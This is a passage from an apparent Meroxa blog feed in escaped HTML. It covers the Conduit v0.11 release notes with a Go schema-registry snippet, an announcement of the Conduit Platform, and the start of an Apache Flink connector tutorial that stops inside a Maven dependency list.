&lt;p&gt;We have introduced a &lt;a href=&quot;https://pkg.go.dev/github.com/conduitio/conduit-processor-sdk/schema&quot;&gt;schema&lt;/a&gt; package in the processor SDK, which can be used to interact with Conduit’s Schema Registry. This package allows processors to retrieve and create schemas, ensuring that type information is preserved throughout data processing.&lt;/p&gt;
&lt;p&gt;Here’s a snippet of how you could interact with the new schema package:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;package&lt;/span&gt; myProcessor

&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;context&quot;&lt;/span&gt;

	sdk &lt;span class=&quot;token string&quot;&gt;&quot;github.com/conduitio/conduit-processor-sdk&quot;&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;github.com/conduitio/conduit-processor-sdk/schema&quot;&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;github.com/conduitio/conduit-commons/opencdc&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;/* ... */&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;p &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;Processor&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;Process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;ctx context&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Context&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; records &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;opencdc&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;ProcessedRecord &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; i&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; r &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;range&lt;/span&gt; recs &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		keySubject&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Metadata&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;GetKeySchemaSubject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		keyVersion&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Metadata&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;GetKeySchemaVersion&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		keySchema&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; schema&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;ctx&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; keySubject&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; keyVersion&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

		payloadSubject&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Metadata&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;GetKeySchemaSubject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		payloadVersion&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Metadata&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;GetKeySchemaVersion&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		payloadSchema&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; schema&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;ctx&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; payloadSubject&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; payloadVersion&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

		&lt;span class=&quot;token comment&quot;&gt;// use keySchema and payloadSchema ...&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Additionally, processors are equipped with new middleware that automatically handles the encoding and decoding of data in records that have an attached schema. The middleware detects changes in data (e.g. new fields, deleted fields, changed field types) and updates the schema, bumping its version according to the applied changes. This middleware is enabled by default for all processors, ensuring seamless schema management without requiring any additional code in the processor implementation.&lt;/p&gt;
&lt;h2&gt;Other improvements&lt;/h2&gt;
&lt;p&gt;Apart from the schema support, we have added several other improvements in v0.11.&lt;/p&gt;
&lt;h3&gt;Documentation search&lt;/h3&gt;
&lt;p&gt;One of the most significant additions to our &lt;a href=&quot;https://conduit.io/docs/&quot;&gt;documentation&lt;/a&gt; is the introduction of a &lt;a href=&quot;https://conduit.io/docs/search/&quot;&gt;search bar&lt;/a&gt;. The search bar allows users to quickly locate the content they are looking for. This feature is especially useful for newcomers who are getting acquainted with Conduit, as it reduces the time spent navigating the documentation.&lt;/p&gt;
&lt;h3&gt;Connector improvements&lt;/h3&gt;
&lt;h3&gt;Postgres connector&lt;/h3&gt;
&lt;p&gt;The latest release of the Postgres connector includes support for incremental snapshots in logical replication mode. This feature allows for safely executing snapshots of the current state before starting to stream changes. It is especially important for large tables, which can take hours or even days to snapshot. With this enhancement, an interrupted snapshot can be resumed from the last successfully synced position.&lt;/p&gt;
&lt;p&gt;We also improved the management of logical replication slots, ensuring that slots created by Conduit are cleaned up when the pipeline is deleted.&lt;/p&gt;
&lt;p&gt;These changes are included in the built-in Postgres connector, but feel free to check out the source for the connector &lt;a href=&quot;https://github.com/conduitIO/conduit-connector-postgres&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;HTTP connector&lt;/h3&gt;
&lt;p&gt;The source connector has now become more flexible, allowing you to use &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-http/blob/main/source_test.go#L171-L176&quot;&gt;JavaScript to specify the behavior&lt;/a&gt; for getting the request data and for parsing the response.&lt;/p&gt;
&lt;p&gt;In the destination connector, we have added the ability to build the URL of the request using data from the incoming parameters.&lt;/p&gt;
&lt;p&gt;Check out the HTTP connector source &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-http&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Processor improvements&lt;/h3&gt;
&lt;h3&gt;&lt;code class=&quot;language-text&quot;&gt;error&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;We introduced a new processor called &lt;code class=&quot;language-text&quot;&gt;error&lt;/code&gt;, which can be used to send a record to the DLQ (&lt;a href=&quot;https://conduit.io/docs/features/dead-letter-queue/&quot;&gt;Dead Letter Queue&lt;/a&gt;) or fail the pipeline. It should always be used together with a &lt;a href=&quot;https://conduit.io/docs/processors/conditions&quot;&gt;condition&lt;/a&gt;, otherwise all records reaching this processor will produce an error.&lt;/p&gt;
&lt;p&gt;Read more about the &lt;code class=&quot;language-text&quot;&gt;error&lt;/code&gt; processor &lt;a href=&quot;https://conduit.io/docs/processors/builtin/error&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;code class=&quot;language-text&quot;&gt;webhook.http&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;We added the ability to specify headers for the &lt;code class=&quot;language-text&quot;&gt;webhook.http&lt;/code&gt; processor.&lt;/p&gt;
&lt;p&gt;Read more about the &lt;code class=&quot;language-text&quot;&gt;webhook.http&lt;/code&gt; processor &lt;a href=&quot;https://conduit.io/docs/processors/builtin/webhook.http&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;code class=&quot;language-text&quot;&gt;field.convert&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;The &lt;code class=&quot;language-text&quot;&gt;field.convert&lt;/code&gt; processor can now convert data to a Go &lt;code class=&quot;language-text&quot;&gt;time.Time&lt;/code&gt; object. It supports converting unix nano timestamps or RFC3339 formatted dates.&lt;/p&gt;
&lt;p&gt;Read more about the &lt;code class=&quot;language-text&quot;&gt;field.convert&lt;/code&gt; processor &lt;a href=&quot;https://conduit.io/docs/processors/builtin/field.convert&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;code class=&quot;language-text&quot;&gt;avro.encode&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;avro.decode&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;These processors previously required users to run an external schema registry and configure the connection string for each processor. Now, they have been updated to use Conduit’s schema registry, eliminating the need for an external service.&lt;/p&gt;
&lt;p&gt;Read more about the &lt;code class=&quot;language-text&quot;&gt;avro.encode&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;avro.decode&lt;/code&gt; processors &lt;a href=&quot;https://conduit.io/docs/processors/builtin/avro.encode&quot;&gt;here&lt;/a&gt; and &lt;a href=&quot;https://conduit.io/docs/processors/builtin/avro.decode&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;What’s next?&lt;/h2&gt;
&lt;p&gt;With the release of Conduit v0.11, we have reached an important milestone. However, there are still exciting features on the horizon. Here’s a glimpse of what’s coming next:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We plan to add more &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions/1559&quot;&gt;robust pipeline lifecycle management&lt;/a&gt; functionality directly into Conduit. Specifically, we will introduce the ability to configure a restart policy at the pipeline level in case of failures. This will enable recovery from transient errors, such as an external service being unreachable, even if the connector itself cannot handle such failures.&lt;/li&gt;
&lt;li&gt;We acknowledge that the Conduit UI has lagged behind the features we’ve added over the past two years, limiting access to Conduit’s full potential. Instead, we focused on improving the internal capabilities and configuring them through configuration files. We think that Conduit is most useful as a tool that can be automated and configured programmatically, therefore we plan to remove the UI from Conduit entirely. In its place, we will add powerful &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions/1642&quot;&gt;CLI commands&lt;/a&gt; to simplify tasks such as bootstrapping new pipelines, exploring the contents of a running Conduit instance, and creating your own processors or connectors.&lt;/li&gt;
&lt;li&gt;We plan to refactor the API and introduce the ability to export and import pipelines into configuration files. This will enhance the integration between the API and configuration management, making it easier to manage and deploy pipelines.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We invite you to participate in shaping the Conduit roadmap by joining our &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub discussions&lt;/a&gt; or starting a new discussion yourself. Your feedback and ideas are crucial in helping us prioritize features that meet your needs.&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Conduit v0.11 brings a host of new features and improvements that enhance the flexibility, usability, and performance of our &lt;a href=&quot;https://meroxa.com&quot;&gt;data streaming platform&lt;/a&gt;. From comprehensive schema support to robust connector and processor enhancements, this release is designed to make data integration more seamless and efficient. We encourage you to upgrade to the latest version and explore these new capabilities. As always, we welcome your feedback and contributions to help shape the future of Conduit. Get involved by joining our &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord server&lt;/a&gt; and saying hello to the team behind Conduit!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Release Notes: Read the full &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.11.0&quot;&gt;release notes&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Documentation: Explore the &lt;a href=&quot;https://docs.meroxa.com/getting-started/quickstart&quot;&gt;documentation&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Announcing the New Conduit Platform by Meroxa]]></title><description><![CDATA[We are thrilled to introduce our latest offering, the Conduit Platform, which brings a host of new features and improvements designed to enhance your real-time data streaming experience, now powered by our robust Conduit open-source core.  This transformation brings enhanced performance, scalability, and usability, coupled with access to over 100 connectors maintained by our dedicated open-source community. Here’s a closer look at what’s new and how it can benefit your data operations.]]></description><link>https://meroxa.com/blog/announcing-the-new-conduit-platform-by-meroxa</link><guid isPermaLink="false">https://meroxa.com/blog/announcing-the-new-conduit-platform-by-meroxa</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Tue, 18 Jun 2024 13:03:06 GMT</pubDate><content:encoded>&lt;p&gt;We are thrilled to introduce our latest offering, the Conduit Platform, which brings a host of new features and improvements designed to enhance your real-time data streaming experience, now powered by our robust Conduit open-source core. This transformation brings enhanced performance, scalability, and usability, coupled with access to over 100 connectors maintained by our dedicated open-source community. Here’s a closer look at what’s new and how it can benefit your data operations.&lt;/p&gt;
&lt;h2&gt;Unparalleled Performance and Isolation&lt;/h2&gt;
&lt;p&gt;The new Conduit Platform features a modular architecture that ensures enhanced performance and comprehensive data isolation. Unlike the previous shared data plane model, this approach significantly reduces system disruptions and enhances reliability. This isolation guarantees that your data operations remain unaffected by other tenants, providing a smoother and more efficient user experience.&lt;/p&gt;
&lt;h2&gt;Accelerated Feature Delivery&lt;/h2&gt;
&lt;p&gt;We can now ship features more quickly and directly to our customers. This means you’ll have access to the latest advancements and improvements without the delays typically associated with shared infrastructure. Our commitment to continuous innovation ensures that your data integration and transformation capabilities are always at the cutting edge.&lt;/p&gt;
&lt;h2&gt;Simplified Data Application Building&lt;/h2&gt;
&lt;p&gt;We’ve listened to our customers who expressed the need to leverage Conduit’s powerful utilities without the complexity of YAML configurations and custom code. Our redesigned dashboard now enables you to build end-to-end real-time data applications with a user-friendly, no-code interface. This intuitive design allows you to focus on what matters most—leveraging your data—without getting bogged down in technical details.&lt;/p&gt;
&lt;h2&gt;Enhanced Team Features&lt;/h2&gt;
&lt;p&gt;The new Conduit Platform also includes a suite of features designed specifically for teams. These enhancements include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Basic Access Controls&lt;/strong&gt;: Manage who can access and modify your data applications with ease.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Secrets Management&lt;/strong&gt;: Securely store and manage sensitive information like API keys and passwords.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Single Sign-On (SSO)&lt;/strong&gt;: Simplify user authentication and enhance security with SSO integration.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And this is just the beginning—many more features are on the way to further empower your team and streamline your data operations.&lt;/p&gt;
&lt;h3&gt;Key Features&lt;/h3&gt;
&lt;h3&gt;Effortless Point and Click Real-Time Data Pipelines&lt;/h3&gt;
&lt;p&gt;Experience the ease of building real-time data pipelines with Conduit Platform. Our intuitive point-and-click interface allows you to quickly set up and manage your data flows without the need for extensive coding knowledge. Transform your data integration process into a seamless and efficient operation.&lt;/p&gt;
&lt;h3&gt;Connect Any Source to Any Destination&lt;/h3&gt;
&lt;p&gt;With Conduit Platform, you can effortlessly connect any data source to any destination. Whether it&apos;s databases, cloud services, or enterprise applications, our platform ensures smooth and reliable data transfer across your entire ecosystem. Break down data silos and achieve unified data access and insights.&lt;/p&gt;
&lt;h3&gt;Low Code Data Transformation&lt;/h3&gt;
&lt;p&gt;Simplify your data movement tasks with our low-code approach. Conduit Platform provides powerful tools that allow you to design and implement complex data transformations with minimal coding. Enhance your workflows and gain valuable insights faster and more efficiently.&lt;/p&gt;
&lt;h2&gt;Get Started Today&lt;/h2&gt;
&lt;p&gt;The all-new Conduit Platform represents a significant leap forward in data integration and transformation. With its isolated tenant model, accelerated feature delivery, and enhanced team features, it’s designed to meet the evolving needs of modern data-driven organizations.
Experience the future of data streaming with the Conduit Platform. Thank you for being a valued member of the Meroxa community. We look forward to supporting your success on this new and improved platform.&lt;/p&gt;
&lt;p&gt;Stay tuned for more updates and detailed guides on how to make the most of the Conduit Platform. If you have any questions or need assistance, click here to &lt;a href=&quot;https://share.hsforms.com/1A4g2JcLMQpSGj-Z7bjx7uAc2sme?__hstc=259081301.6d5dc5950702ea18243d5eabeaba6872.1701109351374.1717020067958.1717083419376.75&amp;#x26;__hssc=259081301.2.1717083419376&amp;#x26;__hsfp=3065315178&quot;&gt;request a demo&lt;/a&gt;. Let&apos;s build the future of data integration together!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Introduction to Meroxa's New Conduit Connector for Apache Flink]]></title><description><![CDATA[Conduit connector for Apache Flink, a powerful combination that significantly expands Flink’s capabilities. Apache Flink is renowned for its robust stream processing capabilities, while Conduit offers a lightweight and fast data streaming solution, simplifying the creation of connectors. ]]></description><link>https://meroxa.com/blog/introduction-to-meroxas-new-conduit-connector-for-apache-flink</link><guid isPermaLink="false">https://meroxa.com/blog/introduction-to-meroxas-new-conduit-connector-for-apache-flink</guid><dc:creator><![CDATA[Haris Osmanagić]]></dc:creator><pubDate>Mon, 17 Jun 2024 17:00:00 GMT</pubDate><content:encoded>&lt;p&gt;At Meroxa, we&apos;re excited to introduce the Conduit connector for Apache Flink, a powerful combination that significantly expands Flink’s capabilities. Apache Flink is renowned for its robust stream processing capabilities, while Conduit offers a lightweight and fast data streaming solution, simplifying the creation of connectors. By integrating these tools, we enhance the options available for real-time data processing.&lt;/p&gt;
&lt;h3&gt;How It Works&lt;/h3&gt;
&lt;p&gt;To leverage the robustness of Apache Flink’s Kafka connector, we have designed the Conduit connector to work seamlessly within Flink environments. Here’s a breakdown of the process:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Flink Source&lt;/strong&gt;: Represents a Conduit pipeline that reads from a data source and writes to a Kafka topic.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Flink Job&lt;/strong&gt;: Processes data from the Kafka topic, transforming it as needed, and writes the processed data to another Kafka topic.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Sink&lt;/strong&gt;: A Conduit pipeline reads data from the Kafka topic and writes it to the final destination.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src=&quot;https://lh7-us.googleusercontent.com/docsz/AD_4nXf5tj-bx5SF4xLasiPMGVY-DqvZoPPaATfNrJfQ5HTTbwstI4Jm-K4izhzy8oHRll_KUw5zrkhputjl2uySZ8SZ8IyLEUnPHeGpfEd-crrBQXMWgLMVKXKnZ7CK5QQIsAC0eOb5QdZEXNgfQ5QGew1fcVs?key=di-HIY_HIDxgv9NmmVZt2Q&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Our Goal&lt;/h3&gt;
&lt;p&gt;To illustrate the capabilities, we&apos;ll demonstrate a job that reads data from Conduit’s &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-generator&quot;&gt;generator connector&lt;/a&gt;, adds metadata, and writes the data to a file.&lt;/p&gt;
&lt;h3&gt;Requirements&lt;/h3&gt;
&lt;p&gt;To get started, you’ll need the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Java 11 or higher&lt;/li&gt;
&lt;li&gt;Maven&lt;/li&gt;
&lt;li&gt;Conduit (refer to our &lt;a href=&quot;https://conduit.io/docs/introduction/getting-started/#installing&quot;&gt;documentation&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Kafka (ensure &lt;code class=&quot;language-text&quot;&gt;auto.create.topics.enable&lt;/code&gt; is set to true)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Setup&lt;/h3&gt;
&lt;p&gt;First, create a new Maven project and include the necessary dependencies:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;xml&quot;&gt;&lt;pre class=&quot;language-xml&quot;&gt;&lt;code class=&quot;language-xml&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;dependencies&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
   &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;dependency&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
     &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;groupId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;com.meroxa&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;groupId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
     &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;artifactId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;conduit-flink-connector&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;artifactId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
     &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;0.0.1-SNAPSHOT&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
   &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;dependency&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
   &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;dependency&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
     &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;groupId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;org.apache.flink&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;groupId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
     &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;artifactId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;flink-streaming-java&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;artifactId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
     &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;1.17.2&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
   &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;dependency&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
   &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;dependency&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
     &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;groupId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;org.apache.flink&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;groupId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
     &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;artifactId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;flink-connector-kafka&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;artifactId&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
     &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;&lt;/span&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;1.17.2&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
   &lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token tag&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;&amp;lt;/&lt;/span&gt;dependency&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;
